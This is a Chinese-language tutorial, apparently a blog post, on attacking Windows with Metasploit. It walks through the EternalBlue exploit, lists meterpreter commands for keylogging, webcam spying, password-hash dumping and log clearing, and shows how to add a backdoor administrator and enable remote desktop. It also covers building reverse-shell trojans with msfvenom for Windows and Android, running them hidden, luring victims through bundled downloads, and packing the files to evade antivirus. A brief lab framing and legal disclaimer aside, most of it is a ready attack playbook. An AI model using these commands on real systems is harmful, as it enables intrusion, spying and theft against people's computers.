进入黑客的世界：Kali Linux 中的 Metasploit 渗透测试利器

数据来源

本文仅用于信息安全学习，请遵守相关法律法规，严禁用于非法途径。若观众因此作出任何危害网络安全的行为，后果自负，与本人无关。

得到ip地址我们能干嘛？

首先进行端口扫描

为什么要进行端口扫描？

端口扫描的作用就是发现目标主机开放的端口及其对应开放的服务，攻击者通过发现及利用服务所存在的漏洞，入侵目标主机。

- Nmap -扫描器之王

metasploit是什么？

msf是一款开源安全漏洞利用和测试工具，集成了各种平台上常见的溢岀漏洞和流行的 shellcode，并持续保持更新。

netasploiti让复杂的漏洞攻击流程变的非常简单，一个电脑小白经过几小时的学习,就能对操作系统等主流漏洞发起危害性攻击。

启动 metasploit 前需要做：

打开ka终端
使用 sudo su命令，并输入kali的密码kali，切换至root用户
使用 msfdb init命令初始化 metasploit数据库(*可选)

metasploit攻击 windows操作系统

msfconsole # 启动 metasploita命令行【命令行效率高,使用方便】

msf使用法则：

使用模块 -> 配置模块必选项 -> 运行模块。三步操作，就能实现对主流漏洞的攻击

永恒之蓝漏洞：

永恒之蓝是指2017年4月14日晚，黑客团体 ShadowBrokers(影子经纪人)公布一大批网络攻击工具,其中包含“永恒之蓝”工具，“永恒之蓝”利用 Windows系统的SMB漏洞可以获取系统最高权限。5月12日，不法分子通过改造“永恒之蓝”制作了 Wannacry勒索病毒，英国、俄罗斯、整个欧洲以及中国国内多个高校校内网、大型企业内网和政府机构专网中招，被勒索支付高额赎金才能解密恢复文件。

metasploit攻击永恒之蓝全流程：

1. 使用模块

use exploit/windows/smb/ms17_010_eternalblue

2. 设置必选项

查看必选项【*required 为yes的就是必选项】

show options

或者

1. 搜索漏洞编号：

search ms17_010 # 搜索2017年的10号漏洞永恒之蓝（微软定义），search 使用

2. 使用模块

可以通过模块名称或模块编号使用模块

use exploit/windows/smb/ms17_010_eternalblue # 通过模块名称使用模块

或（选择一种方式即可）

use 0 # 通过模块编号使用模块

3. 查看模块所需要的配置内容

show options # 可以按tab键自动补全命令，show 显示/展示 options 选项

必选项是：yes 的就是必选设置，一些是有默认的，一些是没有默认的就需要我们添加，如目标主机状态是yes，但是当前设置时空。

实验：

1、准备一台靶机（我这里开了一台winXP），并查看靶机的IP地址（等下用做攻击目标）

ipconfig # 查看本机IP地址

ifconfig eth0 # kali查看IP

2、回到kli设置metasploit的必选项，攻击目标这些

set RHOSTS 192.168.0.103 # 设置目标IP地址，set （设置）RHOSTS 目标主机的名称，代表你要攻击谁，目标主机地址也可以写一个范围如：192.168.0.103-254

show options # show 显示/展示 options 选项，查看还有什么需要设置的

set payload windows/x64/meterpreter/reverse_tcp # payload 是攻击载荷，就是攻击完成后想干啥，这里是想获取 meterpreter （默认就是这个）meterpreter是 metasploit 后渗透的神器

set LHOST 192.168.0.102 # LHOSTS为 listen host （侦听主机）代表你是谁，既kali的IP地址默认就是kali自己的IP地址，如果你的不是那就可以修改

set lport 10001 # 将端口设置为10001，代表你要在kali上开启的端口，1-65535随便选，但不能被占用，默认的端口是：4444，为了攻击的成功率可以改一下

show options # 查看配置

3、启动运行模块，开启攻击

命令：run

我这里攻击失败了，原因：192.168.0.103:445-由于失败而中止利用漏洞：无目标：此模块仅支持x64（64位）目标

开一台64位操作系统的虚拟机，继续实验

继续查看主机IP

重新设置攻击目标

set RHOSTS 192.168.0.106 # 设置目标IP地址

启动运行模块，开启攻击

命令：run

攻击成功命令行就会来到meterpreter>，这里就是拿到了目标主机的权限

攻击成功，拿到了对方的权限可以干嘛？可以输入：help # 查看帮助

核心命令

命令	说明
?	“帮助”菜单
background	当前会话的背景
bg	背景别名
bgkill	杀死背景meterpreter脚本
bglist	列出正在运行的后台脚本
bgrun	作为后台线程执行meterpreter脚本
channel	显示信息或控制活动通道
close	关闭频道
detach	分离meterpreter会话（对于http/https）
disable_unicode_encoding	禁用unicode字符串的编码
enable_unicode_encoding	启用unicode字符串的编码
exit	终止meterpreter会话
get_timeouts	获取当前会话超时值
guid	获取会话guid
help	帮助菜单
info	显示有关Post模块的信息
irb	在当前会话上打开交互式Ruby shell
load	加载一个或多个meterpreter扩展
machine_id	获取连接到会话的计算机的MSF id
migrate	将服务器迁移到另一个进程
pivot	管理数据透视侦听器
pry	在当前会话上打开Pry调试器
quit	终止meterpreter会话
read	从通道读取数据
resource	运行存储在文件中的命令
run	执行meterpreter脚本或Post模块
secure	（重新）协商TLV数据包加密
sessions	快速切换到另一个会话
set_timeouts	设置当前会话超时值
sleep	强制仪表安静，然后重新建立会话，用法：用法：sleep＜秒数＞
ssl_verify	修改ssl证书验证设置
transport	管理运输机制
use	“load”的别名已弃用
uuid	获取当前会话的uuid
write	将数据写入通道

Stdapi：文件系统命令

命令	说明
cat	将文件的内容读到屏幕上
cd	更改目录
checksum	检索文件的校验和
cp	将源复制到目标
del	删除指定的文件
dir	列表文件（ls的别名）
download	下载文件或目录
edit	编辑文件
getlwd	打印本地工作目录
getwd	打印工作目录
lcat	将本地文件的内容读取到屏幕
lcd	更改本地工作目录
lls	列出本地文件
lpwd	打印本地工作目录
ls	列表文件
mkdir	创建新目录
mv	将源文件移动到目标
pwd	打印工作目录
rm	删除指定的文件
rmdir	删除目录
search	搜索文件
show_mount	列出所有装载点/逻辑驱动器
upload	上载文件或目目录（可以用来上传文件到对方电脑）

Stdapi：网络命令

命令	说明
arp	显示主机arp缓存
getproxy	显示当前代理配置
ifconfig	显示界面
ipconfig	显示IP界面
netstat	显示网络连接与对方开放的端口
portfwd	将本地端口转发到远程服务
resolve	解析目标上的一组主机名
route	查看和修改路由表

Stdapi：系统命令

命令	说明
clearev	清除事件日志
drop_token	放弃任何活动模拟令牌。
execute	执行命令
getenv	获取一个或多个环境变量值
getpid	获取当前进程标识符
getprivs	尝试启用当前进程可用的所有权限
getsid	获取服务器正在运行的用户的SID
getuid	获取服务器运行的用户
kill	终止进程
localtime	显示目标系统的本地日期和时间
pgrep	按名称筛选进程
pkill	按名称终止进程
ps	列出正在运行的进程
reboot	重新启动远程计算机
reg	修改并与远程注册表交互
rev2self	在远程计算机上调用RevertToSelf（）
shell	放入系统命令shell
shutdown	关闭远程计算机
stealt_token	尝试从目标进程中窃取模拟令牌
suspend	暂停或恢复进程列表
sysinfo	获取有关远程系统的信息，如操作系统

Stdapi：用户界面命令

命令	说明
enumdesktops	列出所有可访问的桌面和窗口工作站
getdesktop	获取当前meterpreter桌面
idletime	返回远程用户空闲的秒数
keyboard_send	发送键击
keyevent	发送按键事件
keyscan_dump	转储击键缓冲区
keyscan_start	开始捕获击键
keyscan_stop	停止捕获击键
mouse	发送鼠标事件
screenshare	共享实时监视远程用户桌面
screenshot	截图，获取交互式桌面的截图
setdesktop	更改meterpreters当前桌面
uictl	控制一些用户界面组件

Stdapi：正在使用网络摄像头命令

命令	说明
record_mic	从默认麦克风录制音频X秒
webcam_chat	开始视频聊天
webcam_list	列出网络摄像头
webcam_snap	从指定的网络摄像机拍摄快照
webcam_stream	从指定的网络摄像机播放视频流（打开摄像头）

Stdapi：音频输出命令

命令	说明
play	在目标系统上播放波形音频文件（.wav）

Priv：提升命令

命令	说明
getsystem	尝试将您的权限提升到本地系统的权限

密码数据库命令

命令	说明
hashdump	转储SAM数据库的内容

Priv：时间戳命令

命令	说明
timestomp	操纵文件MACE属性

攻击成功后的命令使用：

攻击成功后成功获取到对方主机的权限，上面的这操作命令直接输入到命令行使用就行了

注意：上面表格中的命令我也没有仔细检查过，如果使用时出现报错那应该是我填错了，这时可以输入命令：

help # 查看帮助，按类型获取到正确的命令，也可以在下方给我留言我会及时更改。

攻击成功后的使用示例：

攻击成功后能做什么meterpreter是强大的后渗透模块，可以输入help查看帮助信息

远程控制、命令执行、摄像头监控、密码获取、创建后门用户、破坏篡改系统...这些看起来非常复杂又高级的操作都能用 meterpreter中一行或几个字母,简单的命令完成

例：创建后门用户并开启远程连接（3389）

shell # 启动dos窗口，这样就能使用DOS 命令

chcp 65001 # 默认情况下编码为936，中文会出现乱码问题，65001为UTF-8的代码页，可以正常显示中文

net user zhangsan 123456 /add & net localgroup administrators zhangsan /add

或分开执行

net user zhangsan 123456 /add # 创建一个用户名为“zhangsan ”密码是“123456 ”

net localgroup administrators zhangsan /add # 将zhangsan 加入到管理员组（提升权限）

exit # 退到上一级目录（这里是退出dos窗口回到，meterpreter > ）

getsystem # 先将当前的session提升为system权限（以防万一）

run post/windows/manage/enable_rdp # 利用此后渗透模块即可直接开启远程桌面，开启受害者主机3389端口（远程桌面连接端口）

这样一套命令下来，以后我们就可以直接使用 zhangsan 这个账号登录3389端口的远程桌面服务，远程控制目标主机（mstsc -v 目标ip）

rdesktop 192.168.0.103:3389 # 连接受害者主机的远程桌面，如下图所示：

需要注意的是你登录了，对方会被你挤下线

1）使用Kali渗透工具生成远控木马

想远程控制别人？msfvenom 生成远控木马了解一下

msfvenom 是用来生成后门的软件，在目标机上执行后门，在本地监听上线。

【* msfvenom在shell里使用，不是 msfconsole 终端】

payload 攻击载荷

windows 是指微软的windows操作系统，如果目标是其他系统这里就改成其他系统名称如：Linux

lhost 代表你是谁，既kali的IP地址

lport 代表你要在kali上开启的端口，1-65535随便选，但不能被占用

-f 是指format（格式）

exe 是windows格式文件，是指生成木马文件的文件格式，exe 和 dll（Windows 系列）、elf（Linux 系列）和 Mach-O（Mac系列）

-o 是指output（输出），后面跟的demo.exe是文件名，自定义随便改。

msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=192.168.0.102 lport=9988 -f exe -o demo.exe

msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.43.89 LPORT=9988 R > /home/kali/Desktop/lanxf.apk

生成木马文件示例：

输入：exit # 退回上一级，直到回到kali的命令行中

msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=192.168.0.102 lport=9988 -f exe -o demo999.exe # 生成木马文件

现在文件就生成到桌面的我们可以在桌面查看文件

这个文件可以通过邮箱或其他社交平台发送给对方，然后对方运行了之后我们就可以对他电脑进行远程控制（不过一般情况下会被对方的杀毒软件直接杀死）如下面这样，我们直接把木马文件复制到自己的真实机，杀毒软件会自动检测并杀死。

注意：这里是在命令行的桌面路径下输入命令所以文件默认是生成在桌面，如果想改生成文件的位置，那就把命令后面的文件名改成路径加文件名，如：/home/kali/demo999.exe 。或者使用命令：cd 路径 # 更改命令行的路径

生成木马就完事？把木马文件发送到目标主机

（注意这一步需要使用上面写的方法通过metasploit获取到目标的权限才行，如果对方电脑没有漏洞获取不到对方权限，那就需要用钓鱼的方式让受害者自己下载，比如我们在百度上下载的软件都有很多捆绑软件）

pwd # 打印目标的工作目录

upload /home/kali/桌面/demo999.exe # 把木马文件发送到目标的电脑上

upload /home/kali/桌面/demo999.exe d:\\ # 也可以指定文件路径，发送到对方的D盘根目录下

记得在 msfconsole里开启监听，等待受害者运行上钩

现在有了木马文件，我们要让别人下载，俗称：“钓鱼”

首先：制作鱼钩

msfconsole # 启动 metasploita命令行

use exploit/multi/handler # 使用模块

show options # 查看设置，查看这个模块需要配置那些选项才能使用

1）设置攻击载荷：

set payload windows/x64/meterpreter/reverse_tcp # 这个攻击载荷就是上面我们使用的攻击载荷

show options # 查看设置

2）设置侦听地址

set LHOST 192.168.0.102 # LHOSTS为 listen host （侦听主机）代表你是谁，既kali的IP地址

show options # 查看设置

3）设置帧听端口：

set lport 9988 # 就是要在kali上要开启的端口，注意这里的端口要和前面生成木马文件的端口一样，我上面是用9988端口这里也要9988端口，默认的端口是4444

4）运行模块：run # 简单理解就是把鱼钩放到河里

现在我们要做的就是等待鱼儿上钩:

方法一：我们主动将钩子摁到鱼儿上（利用漏洞）
方法二：姜太公钓鱼，愿者上钩！

假设目标通过网上下载了其他软件比如啥直播、游戏之类的，然后我的木马文件也和这些软件绑定了，他也运行了，之后我们就可以对他进行些操作。

通过命令运行对方的木马文件（需要使用上面写的方法通过metasploit获取到目标的权限）

execute -H -i -f demo999.exe # 运行demo999.exe这个刚才我们发到目标过去的木马文件， -H 不可见，-i 交互

然后输入： help # 查看通过这个木马文件我们能干啥，可以使用的功能和我上面列出来的命令一样

webcam_list	列出网络摄像头（查看对方的电脑有没有摄像头）
webcam_stream	从指定的网络摄像机播放视频流（打开摄像头）

我这里的目标是虚拟机所以这块，响应的信息是没有

ctrl + c 退出监控

杀毒软件会查杀怎么办？一招教你躲避火绒的探测

最基础的免杀【*对于其他杀毒软件效果不同，具体情况请自行尝试】

捆绑木马（现在基本没效果，杀毒软件的技术更新了）

msfvenom -p windows/64/meterpreter/reverse tcp lhost=192.168.0.102 lport=9999 -f exe-xnotepad++. exe -o notepad++.exe

加壳：压缩壳、加密壳

如：Themida

使用示例：

打开软件

然后耐心等待加密过程，最后加密成功的界面如下，之后就可以关闭软件了。

然后可以复制到真实机上测试

后门木马请勿随意传播，如果造成危害属于提供计算机操作系统入侵工具罪及非法入侵计算机操作系统数罪并罚。